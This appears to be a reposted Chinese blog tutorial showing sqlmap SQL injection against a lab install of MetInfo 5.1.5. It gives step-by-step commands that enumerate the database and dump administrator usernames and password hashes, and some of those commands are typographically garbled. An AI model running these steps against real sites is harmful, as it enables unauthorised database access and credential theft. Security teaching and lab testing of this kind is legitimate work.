上次叉叉講了Sqlmap簡單注入(access數據庫)教程，這次咱說說MySql數據庫

MetInfo，是一款強大的企業網站管理系統，采用PHP+Mysql架構。

叉叉下載的是MetInfo 5.1.5的免費版本，咱不是大拿，不會分析源碼，直接丟到WVS里面掃

發現注入點，打開我們的backtrack5,運行Sqlmap神器

獲取當前用戶名稱,輸入命令:python sqlmap.py -u?http://192.168.121.1/MetInfo/about/show.php?id=22?–current-user

獲取當前數據庫名稱，輸入命令:python sqlmap.py -u?http://192.168.121.1/MetInfo/about/show.php?id=22?–current-db

得到數據庫名為：met

列數據庫表名，輸入命令：python sqlmap.py -u?http://192.168.121.1/MetInfo/about/show.php?id=22?–tables -D “met“成功得到”met”數據庫的表名如下圖：

列admin表的字段，輸入命令：python sqlmap.py -u?http://192.168.121.1/MetInfo/about/show.php?id=22?–columns ?-T “met_admin_table“ -D “met”

上圖顯示成功獲取met_admin_table表的字段，下面dump出admin_name和admin_pass內容，輸入命令：python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id=22 –dump -C “admin_pass,admin_name” -T “met_admin_table” -D “met”

如您對本文有疑問或者有任何想說的，請點擊進行留言回復，萬千網友為您解惑！

創作挑戰賽新人創作獎勵來咯，堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的metinfo mysql off_利用Sqlmap测试MetInfo企业网站管理系统MySql注入的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。